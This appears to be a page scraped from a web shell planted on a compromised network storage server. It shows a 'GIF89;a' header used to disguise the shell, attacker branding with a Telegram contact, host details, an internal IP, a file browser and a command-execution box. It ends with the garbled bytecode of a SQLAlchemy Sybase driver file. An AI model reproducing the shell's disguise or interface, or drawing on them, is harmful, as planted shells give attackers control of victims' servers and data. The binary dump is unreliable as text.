GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
sqlalchemy
/
dialects
/
sybase
/
__pycache__
[ HOME ]
Exec
Submit
File Name : pyodbc.cpython-38.pyc
U �}�hH � @ s� d Z ddlZddlmZ ddlmZ ddlmZ ddlm Z ddlm Z G dd � d ej�ZG d d� de �Z G dd � d ee �ZeZdS )a� .. dialect:: sybase+pyodbc :name: PyODBC :dbapi: pyodbc :connectstring: sybase+pyodbc://<username>:<password>@<dsnname>[/<database>] :url: http://pypi.python.org/pypi/pyodbc/ Unicode Support --------------- The pyodbc driver currently supports usage of these Sybase types with Unicode or multibyte strings:: CHAR NCHAR NVARCHAR TEXT VARCHAR Currently *not* supported are:: UNICHAR UNITEXT UNIVARCHAR � N)� processors)�types)�PyODBCConnector)� SybaseDialect)�SybaseExecutionContextc s e Zd ZdZ� fdd�Z� ZS )�_SybNumeric_pyodbcz�Turns Decimals with adjusted() < -6 into floats. It's not yet known how to get decimals with many significant digits or very large adjusted() into Sybase via pyodbc. c s"